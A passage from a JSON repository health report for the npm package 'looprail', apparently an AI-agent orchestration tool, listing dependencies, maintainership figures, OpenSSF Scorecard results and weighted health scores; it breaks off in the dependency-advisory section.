"name": "pathe",
"direct": false,
"version": "1.1.2",
"ecosystem": "npm"
},
{
"name": "pathval",
"direct": false,
"version": "2.0.1",
"ecosystem": "npm"
},
{
"name": "picomatch",
"direct": false,
"version": "4.0.5",
"ecosystem": "npm"
},
{
"name": "pkce-challenge",
"direct": false,
"version": "5.0.1",
"ecosystem": "npm"
},
{
"name": "postcss",
"direct": false,
"version": "8.5.16",
"ecosystem": "npm"
},
{
"name": "prelude-ls",
"direct": false,
"version": "1.2.1",
"ecosystem": "npm"
},
{
"name": "pretty-ms",
"direct": false,
"version": "9.3.0",
"ecosystem": "npm"
},
{
"name": "proxy-addr",
"direct": false,
"version": "2.0.7",
"ecosystem": "npm"
},
{
"name": "punycode",
"direct": false,
"version": "2.3.1",
"ecosystem": "npm"
},
{
"name": "qs",
"direct": false,
"version": "6.15.3",
"ecosystem": "npm"
},
{
"name": "range-parser",
"direct": false,
"version": "1.3.0",
"ecosystem": "npm"
},
{
"name": "raw-body",
"direct": false,
"version": "3.0.2",
"ecosystem": "npm"
},
{
"name": "require-from-string",
"direct": false,
"version": "2.0.2",
"ecosystem": "npm"
},
{
"name": "rollup",
"direct": false,
"version": "4.62.2",
"ecosystem": "npm"
},
{
"name": "router",
"direct": false,
"version": "2.2.0",
"ecosystem": "npm"
},
{
"name": "safer-buffer",
"direct": false,
"version": "2.1.2",
"ecosystem": "npm"
},
{
"name": "semver",
"direct": false,
"version": "7.8.5",
"ecosystem": "npm"
},
{
"name": "send",
"direct": false,
"version": "1.2.1",
"ecosystem": "npm"
},
{
"name": "serve-static",
"direct": false,
"version": "2.2.1",
"ecosystem": "npm"
},
{
"name": "setprototypeof",
"direct": false,
"version": "1.2.0",
"ecosystem": "npm"
},
{
"name": "shebang-command",
"direct": false,
"version": "2.0.0",
"ecosystem": "npm"
},
{
"name": "shebang-regex",
"direct": false,
"version": "3.0.0",
"ecosystem": "npm"
},
{
"name": "side-channel",
"direct": false,
"version": "1.1.1",
"ecosystem": "npm"
},
{
"name": "side-channel-list",
"direct": false,
"version": "1.0.1",
"ecosystem": "npm"
},
{
"name": "side-channel-map",
"direct": false,
"version": "1.0.1",
"ecosystem": "npm"
},
{
"name": "side-channel-weakmap",
"direct": false,
"version": "1.0.2",
"ecosystem": "npm"
},
{
"name": "siginfo",
"direct": false,
"version": "2.0.0",
"ecosystem": "npm"
},
{
"name": "signal-exit",
"direct": false,
"version": "4.1.0",
"ecosystem": "npm"
},
{
"name": "source-map-js",
"direct": false,
"version": "1.2.1",
"ecosystem": "npm"
},
{
"name": "stackback",
"direct": false,
"version": "0.0.2",
"ecosystem": "npm"
},
{
"name": "statuses",
"direct": false,
"version": "2.0.2",
"ecosystem": "npm"
},
{
"name": "std-env",
"direct": false,
"version": "3.10.0",
"ecosystem": "npm"
},
{
"name": "strip-final-newline",
"direct": false,
"version": "4.0.0",
"ecosystem": "npm"
},
{
"name": "tinybench",
"direct": false,
"version": "2.9.0",
"ecosystem": "npm"
},
{
"name": "tinyexec",
"direct": false,
"version": "0.3.2",
"ecosystem": "npm"
},
{
"name": "tinyglobby",
"direct": false,
"version": "0.2.17",
"ecosystem": "npm"
},
{
"name": "tinypool",
"direct": false,
"version": "1.1.1",
"ecosystem": "npm"
},
{
"name": "tinyrainbow",
"direct": false,
"version": "1.2.0",
"ecosystem": "npm"
},
{
"name": "tinyspy",
"direct": false,
"version": "3.0.2",
"ecosystem": "npm"
},
{
"name": "toidentifier",
"direct": false,
"version": "1.0.1",
"ecosystem": "npm"
},
{
"name": "ts-api-utils",
"direct": false,
"version": "2.5.0",
"ecosystem": "npm"
},
{
"name": "tsx",
"direct": false,
"version": "4.22.4",
"ecosystem": "npm"
},
{
"name": "type-check",
"direct": false,
"version": "0.4.0",
"ecosystem": "npm"
},
{
"name": "type-is",
"direct": false,
"version": "2.1.0",
"ecosystem": "npm"
},
{
"name": "typescript",
"direct": false,
"version": "5.9.3",
"ecosystem": "npm"
},
{
"name": "typescript-eslint",
"direct": false,
"version": "8.62.1",
"ecosystem": "npm"
},
{
"name": "undici-types",
"direct": false,
"version": "6.21.0",
"ecosystem": "npm"
},
{
"name": "unicorn-magic",
"direct": false,
"version": "0.3.0",
"ecosystem": "npm"
},
{
"name": "unpipe",
"direct": false,
"version": "1.0.0",
"ecosystem": "npm"
},
{
"name": "uri-js",
"direct": false,
"version": "4.4.1",
"ecosystem": "npm"
},
{
"name": "vary",
"direct": false,
"version": "1.1.2",
"ecosystem": "npm"
},
{
"name": "vite",
"direct": false,
"version": "5.4.21",
"ecosystem": "npm"
},
{
"name": "vite-node",
"direct": false,
"version": "2.1.9",
"ecosystem": "npm"
},
{
"name": "vitest",
"direct": false,
"version": "2.1.9",
"ecosystem": "npm"
},
{
"name": "which",
"direct": false,
"version": "2.0.2",
"ecosystem": "npm"
},
{
"name": "why-is-node-running",
"direct": false,
"version": "2.3.0",
"ecosystem": "npm"
},
{
"name": "word-wrap",
"direct": false,
"version": "1.2.5",
"ecosystem": "npm"
},
{
"name": "wrappy",
"direct": false,
"version": "1.0.2",
"ecosystem": "npm"
},
{
"name": "yocto-queue",
"direct": false,
"version": "0.1.0",
"ecosystem": "npm"
},
{
"name": "yoctocolors",
"direct": false,
"version": "2.1.2",
"ecosystem": "npm"
},
{
"name": "zod-to-json-schema",
"direct": false,
"version": "3.25.2",
"ecosystem": "npm"
}
],
"collected": true,
"truncated": false,
"total_count": 307,
"direct_count": 6,
"indirect_count": 301
}
},
"maintainership": {
"issues": {
"open_prs": 9,
"merged_prs": 0,
"open_issues": 0,
"closed_ratio": null,
"closed_issues": 0,
"closed_unmerged_prs": 3
},
"bus_factor": 1,
"bot_contributors": 0,
"top_contributors": [
{
"type": "User",
"login": "saimeda32",
"commits": 340,
"avatar_url": "https://avatars.githubusercontent.com/u/80650978?v=4"
}
],
"contributors_sampled": 1,
"top_contributor_share": 1
},
"quality_signals": {
"has_ci": true,
"has_tests": true,
"ci_workflows": [
"ci.yml",
"codeql.yml",
"dependabot-auto-merge.yml",
"publish.yml"
],
"has_docs_dir": true,
"linter_configs": [
"eslint.config.js"
],
"has_editorconfig": false,
"has_linter_config": true,
"has_precommit_config": false
},
"security_signals": {
"lockfiles": [
"package-lock.json"
],
"scorecard": {
"checks": [
{
"name": "Binary-Artifacts",
"score": 10,
"reason": "no binaries found in the repo",
"documentation_url": "https://github.com/ossf/scorecard/blob/c395761df6afe1a69e476bc60a013a94bcbc153f/docs/checks.md#binary-artifacts"
},
{
"name": "Branch-Protection",
"score": 0,
"reason": "branch protection not enabled on development/release branches",
"documentation_url": "https://github.com/ossf/scorecard/blob/c395761df6afe1a69e476bc60a013a94bcbc153f/docs/checks.md#branch-protection"
},
{
"name": "CI-Tests",
"score": null,
"reason": "no pull request found",
"documentation_url": "https://github.com/ossf/scorecard/blob/c395761df6afe1a69e476bc60a013a94bcbc153f/docs/checks.md#ci-tests"
},
{
"name": "CII-Best-Practices",
"score": 0,
"reason": "no effort to earn an OpenSSF best practices badge detected",
"documentation_url": "https://github.com/ossf/scorecard/blob/c395761df6afe1a69e476bc60a013a94bcbc153f/docs/checks.md#cii-best-practices"
},
{
"name": "Code-Review",
"score": 0,
"reason": "Found 0/30 approved changesets -- score normalized to 0",
"documentation_url": "https://github.com/ossf/scorecard/blob/c395761df6afe1a69e476bc60a013a94bcbc153f/docs/checks.md#code-review"
},
{
"name": "Contributors",
"score": 0,
"reason": "project has 0 contributing companies or organizations -- score normalized to 0",
"documentation_url": "https://github.com/ossf/scorecard/blob/c395761df6afe1a69e476bc60a013a94bcbc153f/docs/checks.md#contributors"
},
{
"name": "Dangerous-Workflow",
"score": 10,
"reason": "no dangerous workflow patterns detected",
"documentation_url": "https://github.com/ossf/scorecard/blob/c395761df6afe1a69e476bc60a013a94bcbc153f/docs/checks.md#dangerous-workflow"
},
{
"name": "Dependency-Update-Tool",
"score": 10,
"reason": "update tool detected",
"documentation_url": "https://github.com/ossf/scorecard/blob/c395761df6afe1a69e476bc60a013a94bcbc153f/docs/checks.md#dependency-update-tool"
},
{
"name": "Fuzzing",
"score": 0,
"reason": "project is not fuzzed",
"documentation_url": "https://github.com/ossf/scorecard/blob/c395761df6afe1a69e476bc60a013a94bcbc153f/docs/checks.md#fuzzing"
},
{
"name": "License",
"score": 10,
"reason": "license file detected",
"documentation_url": "https://github.com/ossf/scorecard/blob/c395761df6afe1a69e476bc60a013a94bcbc153f/docs/checks.md#license"
},
{
"name": "Maintained",
"score": 0,
"reason": "project was created within the last 90 days. Please review its contents carefully",
"documentation_url": "https://github.com/ossf/scorecard/blob/c395761df6afe1a69e476bc60a013a94bcbc153f/docs/checks.md#maintained"
},
{
"name": "Packaging",
"score": 10,
"reason": "packaging workflow detected",
"documentation_url": "https://github.com/ossf/scorecard/blob/c395761df6afe1a69e476bc60a013a94bcbc153f/docs/checks.md#packaging"
},
{
"name": "Pinned-Dependencies",
"score": 3,
"reason": "dependency not pinned by hash detected -- score normalized to 3",
"documentation_url": "https://github.com/ossf/scorecard/blob/c395761df6afe1a69e476bc60a013a94bcbc153f/docs/checks.md#pinned-dependencies"
},
{
"name": "SAST",
"score": 10,
"reason": "SAST tool detected: CodeQL",
"documentation_url": "https://github.com/ossf/scorecard/blob/c395761df6afe1a69e476bc60a013a94bcbc153f/docs/checks.md#sast"
},
{
"name": "Security-Policy",
"score": 3,
"reason": "security policy file detected",
"documentation_url": "https://github.com/ossf/scorecard/blob/c395761df6afe1a69e476bc60a013a94bcbc153f/docs/checks.md#security-policy"
},
{
"name": "Signed-Releases",
"score": null,
"reason": "no releases found",
"documentation_url": "https://github.com/ossf/scorecard/blob/c395761df6afe1a69e476bc60a013a94bcbc153f/docs/checks.md#signed-releases"
},
{
"name": "Token-Permissions",
"score": 0,
"reason": "detected GitHub workflow tokens with excessive permissions",
"documentation_url": "https://github.com/ossf/scorecard/blob/c395761df6afe1a69e476bc60a013a94bcbc153f/docs/checks.md#token-permissions"
},
{
"name": "Vulnerabilities",
"score": 4,
"reason": "6 existing vulnerabilities detected",
"documentation_url": "https://github.com/ossf/scorecard/blob/c395761df6afe1a69e476bc60a013a94bcbc153f/docs/checks.md#vulnerabilities"
}
],
"commit": "e054b1032c3bff76b0dec07e54a3b550a68b00a5",
"ran_at": "2026-07-21T18:47:27Z",
"aggregate_score": 4.6,
"scorecard_version": "v5.5.0"
},
"has_codeql_workflow": true,
"has_security_policy": true,
"has_dependabot_config": true
}
},
"config": {
"disabled_metrics": [],
"disabled_categories": [],
"disabled_components": {}
},
"source": {
"url": "https://github.com/saimeda32/looprail",
"host": "github.com",
"name": "looprail",
"owner": "saimeda32"
},
"metrics": {
"overall": {
"key": "overall",
"band": "moderate",
"name": "Overall health",
"note": null,
"notes": [],
"value": 59,
"inputs": {
"security": 57,
"vitality": 79,
"community": 39,
"governance": 32,
"engineering": 88
},
"components": []
},
"categories": [
{
"key": "vitality",
"band": "good",
"name": "Vitality",
"value": 79,
"weight": 0.22,
"metrics": [
{
"key": "development_activity",
"band": "moderate",
"name": "Development activity",
"note": null,
"notes": [],
"value": 65,
"inputs": {
"commits_last_year": 340,
"human_commit_share": 1,
"days_since_last_push": 2,
"active_weeks_last_year": 16
},
"components": [
{
"key": "push_recency",
"name": "Push recency",
"detail": "last push 2 days ago",
"points": 36,
"status": "met",
"details": [
{
"code": "push_recency",
"params": {
"days": 2
}
}
],
"max_points": 36
},
{
"key": "commit_cadence",
"name": "Commit cadence",
"detail": "16/52 weeks with commits",
"points": 11.1,
"status": "partial",
"details": [
{
"code": "commit_cadence_weeks",
"params": {
"weeks": 16
}
}
],
"max_points": 36
},
{
"key": "commit_volume",
"name": "Commit volume",
"detail": "340 commits in the last year",
"points": 18,
"status": "met",
"details": [
{
"code": "commits_last_year",
"params": {
"count": 340
}
}
],
"max_points": 18
},
{
"key": "openssf_scorecard_maintained",
"name": "OpenSSF Scorecard: Maintained",
"detail": "project was created within the last 90 days. Please review its contents carefully",
"points": 0,
"status": "missed",
"details": [],
"max_points": 10
}
]
},
{
"key": "release_discipline",
"band": "excellent",
"name": "Release discipline",
"note": "Excluded from scoring (no data or not applicable): OpenSSF Scorecard: Signed-Releases. Remaining weights renormalized.",
"notes": [
{
"code": "excluded_no_data",
"params": {
"components": [
"openssf_scorecard_signed_releases"
]
}
},
{
"code": "weights_renormalized",
"params": {}
}
],
"value": 100,
"inputs": {
"releases_count": 16,
"latest_release_tag": "v0.11.0",
"releases_from_tags": false,
"days_since_latest_release": 4,
"mean_days_between_releases": 1
},
"components": [
{
"key": "ships_releases",
"name": "Ships releases",
"detail": "16 releases published",
"points": 27,
"status": "met",
"details": [
{
"code": "releases_published",
"params": {
"count": 16
}
}
],
"max_points": 27
},
{
"key": "release_recency",
"name": "Release recency",
"detail": "latest release 4 days ago",
"points": 36,
"status": "met",
"details": [
{
"code": "release_recency",
"params": {
"days": 4
}
}
],
"max_points": 36
},
{
"key": "release_cadence",
"name": "Release cadence",
"detail": "a release every ~1 days",
"points": 27,
"status": "met",
"details": [
{
"code": "release_cadence",
"params": {
"gap": 1
}
}
],
"max_points": 27
},
{
"key": "openssf_scorecard_signed_releases",
"name": "OpenSSF Scorecard: Signed-Releases",
"detail": "no releases found",
"points": 0,
"status": "excluded",
"details": [
{
"code": "no_data",
"params": {}
}
],
"max_points": 10
}
]
},
{
"key": "abandonment",
"band": "excellent",
"name": "Abandonment",
"note": null,
"notes": [],
"value": 100,
"inputs": {
"cap": null,
"state": "unverified",
"guards": [],
"signals": [],
"red_flag": false,
"multiplier_pct": 100,
"declared_reason": null,
"unverified_reason": "repository_too_young",
"unanswered_open_prs": null,
"unanswered_open_issues": null,
"days_since_last_merged_pr": null,
"days_since_last_human_commit": null,
"days_since_last_human_commit_is_floor": false
},
"components": [
{
"key": "project_is_still_maintained",
"name": "Project is still maintained",
"detail": "maintenance record not established from the collected data",
"points": 100,
"status": "met",
"details": [
{
"code": "abandonment_unverified",
"params": {}
}
],
"max_points": 100
}
]
}
],
"description": "Is the project alive — is code being written and are releases shipping?"
},
{
"key": "community",
"band": "at_risk",
"name": "Community & Adoption",
"value": 39,
"weight": 0.18,
"metrics": [
{
"key": "popularity",
"band": "critical",
"name": "Popularity & adoption",
"note": null,
"notes": [],
"value": 1,
"inputs": {
"forks": 0,
"stars": 0,
"watchers": 0,
"growth_state": "unverified",
"growth_factor_pct": 100,
"growth_unverified_reason": "no_history"
},
"components": [
{
"key": "stars",
"name": "Stars",
"detail": "0 stars",
"points": 0,
"status": "missed",
"details": [
{
"code": "stars",
"params": {
"count": 0
}
}
],
"max_points": 60
},
{
"key": "forks",
"name": "Forks",
"detail": "0 forks",
"points": 0,
"status": "missed",
"details": [
{
"code": "forks",
"params": {
"count": 0
}
}
],
"max_points": 25
},
{
"key": "watchers",
"name": "Watchers",
"detail": "0 watchers",
"points": 0,
"status": "missed",
"details": [
{
"code": "watchers",
"params": {
"count": 0
}
}
],
"max_points": 15
}
]
},
{
"key": "community_health",
"band": "good",
"name": "Community health",
"note": null,
"notes": [],
"value": 70,
"inputs": {
"has_readme": true,
"has_license": true,
"has_contributing": true,
"has_issue_template": false,
"has_code_of_conduct": false,
"has_pull_request_template": false
},
"components": [
{
"key": "readme",
"name": "README",
"detail": null,
"points": 22.5,
"status": "met",
"details": [],
"max_points": 22.5
},
{
"key": "license",
"name": "License",
"detail": "recognized license (MIT)",
"points": 22.5,
"status": "met",
"details": [
{
"code": "license_standard",
"params": {}
},
{
"code": "license_spdx",
"params": {
"spdx": "MIT"
}
}
],
"max_points": 22.5
},
{
"key": "contributing_guide",
"name": "CONTRIBUTING guide",
"detail": null,
"points": 18,
"status": "met",
"details": [],
"max_points": 18
},
{
"key": "code_of_conduct",
"name": "Code of conduct",
"detail": null,
"points": 0,
"status": "missed",
"details": [],
"max_points": 13.5
},
{
"key": "issue_template",
"name": "Issue template",
"detail": null,
"points": 0,
"status": "missed",
"details": [],
"max_points": 7.2
},
{
"key": "pr_template",
"name": "PR template",
"detail": null,
"points": 0,
"status": "missed",
"details": [],
"max_points": 6.3
}
]
},
{
"key": "ecosystem_adoption",
"band": "moderate",
"name": "Ecosystem adoption (downloads)",
"note": "Excluded from scoring (no data or not applicable): Registry dependents. Remaining weights renormalized.",
"notes": [
{
"code": "excluded_no_data",
"params": {
"components": [
"registry_dependents"
]
}
},
{
"code": "weights_renormalized",
"params": {}
}
],
"value": 57,
"inputs": {
"packages": [
"looprail"
],
"dependents": null,
"ecosystems": "npm",
"total_downloads": null,
"monthly_downloads": 2490
},
"components": [
{
"key": "monthly_downloads",
"name": "Monthly downloads",
"detail": "2,490 downloads/month across npm",
"points": 45.3,
"status": "partial",
"details": [
{
"code": "downloads_monthly",
"params": {
"count": 2490,
"ecosystems": "npm"
}
}
],
"max_points": 80
},
{
"key": "registry_dependents",
"name": "Registry dependents",
"detail": "not reported by this ecosystem",
"points": 0,
"status": "excluded",
"details": [
{
"code": "not_reported_by_this_ecosystem",
"params": {}
}
],
"max_points": 20
}
]
}
],
"description": "Does the project have users, downloads, attention, and a welcoming setup for contributors?"
},
{
"key": "governance",
"band": "at_risk",
"name": "Sustainability & Governance",
"value": 32,
"weight": 0.24,
"metrics": [
{
"key": "maintainer_resilience",
"band": "critical",
"name": "Maintainer resilience (bus factor)",
"note": null,
"notes": [],
"value": 10,
"inputs": {
"bus_factor": 1,
"contributors_sampled": 1,
"top_contributor_share": 1
},
"components": [
{
"key": "bus_factor",
"name": "Bus factor",
"detail": "1 contributor(s) cover half of all commits",
"points": 9,
"status": "partial",
"details": [
{
"code": "bus_factor",
"params": {
"count": 1
}
}
],
"max_points": 54
},
{
"key": "commit_distribution",
"name": "Commit distribution",
"detail": "top contributor authored 100% of commits",
"points": 0,
"status": "missed",
"details": [
{
"code": "top_contributor_share",
"params": {
"share": 100
}
}
],
"max_points": 22.5
},
{
"key": "contributor_breadth",
"name": "Contributor breadth",
"detail": "1 contributors",
"points": 1.4,
"status": "partial",
"details": [
{
"code": "contributors_sampled",
"params": {
"count": 1
}
}
],
"max_points": 13.5
},
{
"key": "openssf_scorecard_contributors",
"name": "OpenSSF Scorecard: Contributors",
"detail": "project has 0 contributing companies or organizations -- score normalized to 0",
"points": 0,
"status": "missed",
"details": [],
"max_points": 10
}
]
},
{
"key": "responsiveness",
"band": "critical",
"name": "Issue & PR responsiveness",
"note": "Excluded from scoring (no data or not applicable): Issue resolution. Remaining weights renormalized.",
"notes": [
{
"code": "excluded_no_data",
"params": {
"components": [
"issue_resolution"
]
}
},
{
"code": "weights_renormalized",
"params": {}
}
],
"value": 1,
"inputs": {
"merged_prs": 0,
"open_issues": 0,
"closed_issues": 0,
"issue_closed_ratio": null,
"closed_unmerged_prs": 3
},
"components": [
{
"key": "issue_resolution",
"name": "Issue resolution",
"detail": "no issues or no data",
"points": 0,
"status": "excluded",
"details": [
{
"code": "no_issues_or_data",
"params": {}
}
],
"max_points": 46.75
},
{
"key": "pr_acceptance",
"name": "PR acceptance",
"detail": "0/3 decided PRs merged",
"points": 0,
"status": "missed",
"details": [
{
"code": "decided_prs_merged",
"params": {
"merged": 0,
"decided": 3
}
}
],
"max_points": 38.25
},
{
"key": "openssf_scorecard_code_review",
"name": "OpenSSF Scorecard: Code-Review",
"detail": "Found 0/30 approved changesets -- score normalized to 0",
"points": 0,
"status": "missed",
"details": [],
"max_points": 15
}
]
},
{
"key": "stewardship",
"band": "at_risk",
"name": "Ownership & stewardship",
"note": "Excluded from scoring (no data or not applicable): Verified domain. Remaining weights renormalized.",
"notes": [
{
"code": "excluded_no_data",
"params": {
"components": [
"verified_domain"
]
}
},
{
"code": "weights_renormalized",
"params": {}
}
],
"value": 35,
"inputs": {
"followers": 0,
"owner_type": "User",
"is_verified": null,
"owner_login": "saimeda32",
"public_repos": 10,
"account_age_days": 1954
},
"components": [
{
"key": "ownership_backing",
"name": "Ownership backing",
"detail": "personal (user) account",
"points": 10,
"status": "partial",
"details": [
{
"code": "owner_personal",
"params": {}
}
],
"max_points": 30
},
{
"key": "verified_domain",
"name": "Verified domain",
"detail": "not applicable to user accounts",
"points": 0,
"status": "excluded",
"details": [
{
"code": "not_applicable_to_user_accounts",
"params": {}
}
],
"max_points": 20
},
{
"key": "owner_reach",
"name": "Owner reach",
"detail": "0 followers of saimeda32",
"points": 0,
"status": "missed",
"details": [
{
"code": "owner_followers",
"params": {
"count": 0,
"login": "saimeda32"
}
}
],
"max_points": 25
},
{
"key": "track_record",
"name": "Track record",
"detail": "10 public repos, account ~5 yr old",
"points": 18.3,
"status": "partial",
"details": [
{
"code": "public_repos",
"params": {
"count": 10
}
},
{
"code": "account_age_years",
"params": {
"years": 5
}
}
],
"max_points": 25
}
]
},
{
"key": "package_maintenance",
"band": "excellent",
"name": "Package maintenance",
"note": null,
"notes": [],
"value": 100,
"inputs": {
"packages": [
"looprail"
],
"ecosystems": "npm",
"any_deprecated": false,
"min_days_since_publish": 4
},
"components": [
{
"key": "published_resolvable",
"name": "Published & resolvable",
"detail": "1 package(s) on npm",
"points": 25,
"status": "met",
"details": [
{
"code": "packages_published",
"params": {
"count": 1,
"ecosystems": "npm"
}
}
],
"max_points": 25
},
{
"key": "publish_recency",
"name": "Publish recency",
"detail": "latest publish 4 days ago",
"points": 35,
"status": "met",
"details": [
{
"code": "publish_recency",
"params": {
"days": 4
}
}
],
"max_points": 35
},
{
"key": "version_history",
"name": "Version history",
"detail": "15 published versions",
"points": 20,
"status": "met",
"details": [
{
"code": "published_versions",
"params": {
"count": 15
}
}
],
"max_points": 20
},
{
"key": "not_deprecated",
"name": "Not deprecated",
"detail": "active, not deprecated or yanked",
"points": 20,
"status": "met",
"details": [
{
"code": "package_not_deprecated",
"params": {}
}
],
"max_points": 20
}
]
}
],
"description": "Will the project survive its people — bus factor, responsiveness, who backs it, and package upkeep?"
},
{
"key": "engineering",
"band": "excellent",
"name": "Engineering Quality",
"value": 88,
"weight": 0.2,
"metrics": [
{
"key": "engineering_practices",
"band": "good",
"name": "Engineering practices",
"note": "Excluded from scoring (no data or not applicable): OpenSSF Scorecard: CI-Tests. Remaining weights renormalized.",
"notes": [
{
"code": "excluded_no_data",
"params": {
"components": [
"openssf_scorecard_ci_tests"
]
}
},
{
"code": "weights_renormalized",
"params": {}
}
],
"value": 80,
"inputs": {
"has_ci": true,
"has_tests": true,
"has_editorconfig": false,
"has_linter_config": true,
"has_precommit_config": false
},
"components": [
{
"key": "ci_workflows",
"name": "CI workflows",
"detail": "4 workflow(s)",
"points": 24,
"status": "met",
"details": [
{
"code": "ci_workflows",
"params": {
"count": 4
}
}
],
"max_points": 24
},
{
"key": "tests_present",
"name": "Tests present",
"detail": null,
"points": 24,
"status": "met",
"details": [],
"max_points": 24
},
{
"key": "linter_config",
"name": "Linter config",
"detail": "eslint.config.js",
"points": 16,
"status": "met",
"details": [
{
"code": "file_list",
"params": {
"files": "eslint.config.js"
}
}
],
"max_points": 16
},
{
"key": "pre_commit_hooks",
"name": "Pre-commit hooks",
"detail": null,
"points": 0,
"status": "missed",
"details": [],
"max_points": 9.6
},
{
"key": "editorconfig",
"name": ".editorconfig",
"detail": null,
"points": 0,
"status": "missed",
"details": [],
"max_points": 6.4
},
{
"key": "openssf_scorecard_ci_tests",
"name": "OpenSSF Scorecard: CI-Tests",
"detail": "no pull request found",
"points": 0,
"status": "excluded",
"details": [
{
"code": "no_data",
"params": {}
}
],
"max_points": 20
}
]
},
{
"key": "documentation",
"band": "excellent",
"name": "Documentation",
"note": null,
"notes": [],
"value": 100,
"inputs": {
"topics": [
"agentic-workflows",
"ai-agents",
"automation",
"claude",
"cli",
"coding-agent",
"developer-tools",
"github-copilot",
"llm",
"typescript",
"agent-orchestration",
"llm-verification",
"multi-agent",
"multi-provider"
],
"has_wiki": true,
"homepage": "https://saimeda32.github.io/looprail/",
"has_readme": true,
"has_docs_dir": true,
"has_description": true
},
"components": [
{
"key": "readme",
"name": "README",
"detail": null,
"points": 30,
"status": "met",
"details": [],
"max_points": 30
},
{
"key": "documentation_directory",
"name": "Documentation directory",
"detail": null,
"points": 25,
"status": "met",
"details": [],
"max_points": 25
},
{
"key": "documentation_homepage_site",
"name": "Documentation / homepage site",
"detail": "https://saimeda32.github.io/looprail/",
"points": 15,
"status": "met",
"details": [],
"max_points": 15
},
{
"key": "repository_description",
"name": "Repository description",
"detail": null,
"points": 10,
"status": "met",
"details": [],
"max_points": 10
},
{
"key": "topics",
"name": "Topics",
"detail": "14 topics",
"points": 10,
"status": "met",
"details": [
{
"code": "topics_count",
"params": {
"count": 14
}
}
],
"max_points": 10
},
{
"key": "wiki",
"name": "Wiki",
"detail": null,
"points": 10,
"status": "met",
"details": [],
"max_points": 10
}
]
}
],
"description": "Are baseline engineering and documentation practices in place?"
},
{
"key": "security",
"band": "moderate",
"name": "Security",
"value": 57,
"weight": 0.16,
"metrics": [
{
"key": "security_posture",
"band": "at_risk",
"name": "Security posture",
"note": "Excluded from scoring (no data or not applicable): CI-Tests, Signed-Releases. Remaining weights renormalized.",
"notes": [
{
"code": "excluded_no_data",
"params": {
"components": [
"ci_tests",
"signed_releases"
]
}
},
{
"code": "weights_renormalized",
"params": {}
}
],
"value": 46,
"inputs": {
"source": "openssf_scorecard",
"checks_evaluated": 16,
"scorecard_version": "v5.5.0",
"checks_inconclusive": 2,
"scorecard_aggregate": 4.6
},
"components": [
{
"key": "binary_artifacts",
"name": "Binary-Artifacts",
"detail": "no binaries found in the repo",
"points": 7.5,
"status": "met",
"details": [],
"max_points": 7.5
},
{
"key": "branch_protection",
"name": "Branch-Protection",
"detail": "branch protection not enabled on development/release branches",
"points": 0,
"status": "missed",
"details": [],
"max_points": 7.5
},
{
"key": "ci_tests",
"name": "CI-Tests",
"detail": "no pull request found",
"points": 0,
"status": "excluded",
"details": [
{
"code": "no_data",
"params": {}
}
],
"max_points": 2.5
},
{
"key": "cii_best_practices",
"name": "CII-Best-Practices",
"detail": "no effort to earn an OpenSSF best practices badge detected",
"points": 0,
"status": "missed",
"details": [],
"max_points": 2.5
},
{
"key": "code_review",
"name": "Code-Review",
"detail": "Found 0/30 approved changesets -- score normalized to 0",
"points": 0,
"status": "missed",
"details": [],
"max_points": 7.5
},
{
"key": "contributors",
"name": "Contributors",
"detail": "project has 0 contributing companies or organizations -- score normalized to 0",
"points": 0,
"status": "missed",
"details": [],
"max_points": 2.5
},
{
"key": "dangerous_workflow",
"name": "Dangerous-Workflow",
"detail": "no dangerous workflow patterns detected",
"points": 10,
"status": "met",
"details": [],
"max_points": 10
},
{
"key": "dependency_update_tool",
"name": "Dependency-Update-Tool",
"detail": "update tool detected",
"points": 7.5,
"status": "met",
"details": [],
"max_points": 7.5
},
{
"key": "fuzzing",
"name": "Fuzzing",
"detail": "project is not fuzzed",
"points": 0,
"status": "missed",
"details": [],
"max_points": 5
},
{
"key": "license",
"name": "License",
"detail": "license file detected",
"points": 2.5,
"status": "met",
"details": [],
"max_points": 2.5
},
{
"key": "maintained",
"name": "Maintained",
"detail": "project was created within the last 90 days. Please review its contents carefully",
"points": 0,
"status": "missed",
"details": [],
"max_points": 7.5
},
{
"key": "packaging",
"name": "Packaging",
"detail": "packaging workflow detected",
"points": 5,
"status": "met",
"details": [],
"max_points": 5
},
{
"key": "pinned_dependencies",
"name": "Pinned-Dependencies",
"detail": "dependency not pinned by hash detected -- score normalized to 3",
"points": 1.5,
"status": "partial",
"details": [],
"max_points": 5
},
{
"key": "sast",
"name": "SAST",
"detail": "SAST tool detected: CodeQL",
"points": 5,
"status": "met",
"details": [],
"max_points": 5
},
{
"key": "security_policy",
"name": "Security-Policy",
"detail": "security policy file detected",
"points": 1.5,
"status": "partial",
"details": [],
"max_points": 5
},
{
"key": "signed_releases",
"name": "Signed-Releases",
"detail": "no releases found",
"points": 0,
"status": "excluded",
"details": [
{
"code": "no_data",
"params": {}
}
],
"max_points": 7.5
},
{
"key": "token_permissions",
"name": "Token-Permissions",
"detail": "detected GitHub workflow tokens with excessive permissions",
"points": 0,
"status": "missed",
"details": [],
"max_points": 7.5
},
{
"key": "vulnerabilities",
"name": "Vulnerabilities",
"detail": "6 existing vulnerabilities detected",
"points": 3,
"status": "partial",
"details": [],
"max_points": 7.5
}
]
},
{
"key": "dependency_advisories",
"band": "excellent",
"name": "Dependency advisories",
"note": "Excluded from scoring (no data or not applicable): Indirect dependencies free of known advisories, No advisories left outstanding. Remaining weights renormalized. Matched 307 resolved dependencies against OSV. This repository publishes no package the index resolves, so the repository dependency graph was assessed instead. That graph mixes development and test pins with shipped dependencies, so only the declared runtime dependencies are scored; transitive findings are reported as context and excluded from the score. Reachability is not analyzed.",
"notes": [
{
"code": "excluded_no_data",
"params": {
"components": [
"indirect_dependencies_free_of_known_advisories",
"no_advisories_left_outstanding"
]
}
},
{
"code": "weights_renormalized",
"params": {}
},
{
"code": "advisories_scope_repository",
"params": {
"assessed": 307
}
},
{
"code": "advisories_repo_graph_caveat",
"params": {}
},
{
"code": "advisories_reachability",
"params": {}
}
],
"value": 100,
"inputs": {
"source": "osv",
"advisories": 6,
"affected_packages": 4,
"assessed_packages": 307,
"unassessed_packages": 0,
"affected_by_severity": "critical 1, high 1, moderate 2",
"direct_affected_packages": 0
},
"components": [
{
"key": "direct_dependencies_free_of_known_advisories",
"name": "Direct dependencies free of known advisories",
"detail": "no direct dependency carries a known advisory",
"points": 35,
"status": "met",
"details": [
{
"code": "no_direct_advisories",
"params": {}
}
],
"max_points": 35
},
{
"key": "indirect_dependencies_free_of_known_advisories",
"name": "Indirect dependencies free of known advisories",
"detail": "transitive set not separable from development and test dependencies in this scope",
"points": 0,
"status": "excluded",
"details": [
{
"code": "advisories_scope_not_separable",
"params": {}
}
],
"max_points": 25
},
